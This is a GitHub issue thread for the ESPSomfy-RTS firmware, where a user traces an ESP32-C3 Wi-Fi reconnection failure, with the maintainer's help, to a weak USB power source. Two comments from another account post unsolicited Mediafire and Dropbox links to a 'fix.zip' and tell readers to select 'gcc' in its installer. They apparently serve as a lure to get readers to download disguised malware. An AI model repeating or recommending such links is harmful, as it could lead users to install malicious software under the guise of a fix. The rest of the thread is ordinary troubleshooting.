rstrouse/ESPSomfy-RTS #460: Does not connect back to wifi after first setup

dhacs00, 2024-08-25:
### Hardware

ESP32-C3

### Firmware version

v2.4.7

### Application version

v2.4.7

### What happened? What did you expect to happen?

After first wifi setup, while still connected to computer, wifi connection is working. Once physically disconnected from power, it never connects back to wifi no matter what power source it is connected to, even the computer. The AP mode does not activate either.

### How to reproduce it (step by step)

```bash
Using Seeed Studio XIAO ESP32-C3 and a CC1101 transceiver.
1. connect esp board to computer 
2. with esptool, erase rom, flash SomfyController.onboard.esp32c3.bin
3. AP shows up, configure access to wifi, radio, etc.
4. board connects to home wifi and I can make the configuration
5. everything works (shutters, etc.)
6. disconnect cable from computer
7. power the device anywhere else
8. device never connects back to home wifi, and AP never gets back on even after 3+ minutes
```

### Logs

```bash
Sorry, I don't know how to get logs. I tried to open serial connection from computer but it does not show anything at all (either no data showing up on serial or bad serial parameters (I kept default, not knowing which one to use)).
```

Dev-Victor-Rodrigues, 2024-08-26:
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

Dev-Victor-Rodrigues, 2024-08-26:
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

rstrouse, 2024-08-26:
Install v2.4.7 pre-release and the logs should show.  However this appears to be a power supply problem if you are able to connect to Wi-Fi with the data cable.

dhacs00, 2024-08-26:
Thank you for your answer!

The problem occurs even when connecting back the ESP board to the computer, with the same cable used to program it, so I don't think this is a cable problem.

I forgot to provide the pinout I used, it may matter (reference here: https://files.seeedstudio.com/wiki/XIAO_WiFi/pin_map-2.png):
1. GND : GND
2. VCC : 3v3
3. GDO0 TX : GPIO 3 (D1)
4. CSN : GPIO 7 (D5)
5. SCK : GPIO 8 (D8)
6. MOSI : GPIO 10 (D10)
7. MISO : GPIO 9 (D9)
8. GDO2 RX : GPIO 4 (D2)

How do you access logs ? I tried `picocom /dev/ttyACM0`, also with baudrate 1200 after writing v.2.4.7 preview, but nothing comes up.

Thanks again!

rstrouse, 2024-08-26:
After you connect the data cable and connect to the ESP32 in https://web.esphome.io/ click on the logs tab and this should show you all the serial output.

dhacs00, 2024-08-26:
Thank you again, I got access to the logs.

Tinkering with the pinout, I noticed:
- When the transceiver is powered with the board, nothing at all shows up in the logs
- When I disconnect GND/3V3 from the transceiver, the ESP32 boots correctly and connect to wifi. I can then power the transceiver and use it to send radio signals.

It looks like something in my pinout prevents the bord from booting. So I looked into the datasheet (https://www.espressif.com/sites/default/files/documentation/esp32-c3_datasheet_en.pdf) for pins that may alter boot sequence. GPIOs 2, 8 and 9 may. The latter are respectively used to connect SCK and MISO. GPIO2 is floating, grounding it doesn't change anything about the booting problem.

I'll keep investigating but I think I will eventually change the board to a XIAO ESP32-S3 if I can't make it work.

rstrouse, 2024-09-05:
Please make sure you are connecting the transceiver to 3v3 and not 5v.  That being said the XIAO ESP32-S3 is actually my new favorite board.
https://github.com/rstrouse/ESPSomfy-RTS/wiki/Mini-ESP32s3-Device-Build

dhacs00, 2024-09-07:
Hello, 
The VCC was indeed connected to 3v3.

I think I found the problem: it seems the board cannot be powered from the USB port of my home router. I actually had to try a bunch of USB chargers before figuring this out :/

I used an old USB charger and it worked with this one :)

Thanks again for your help!

closed 2024-09-07 by dhacs00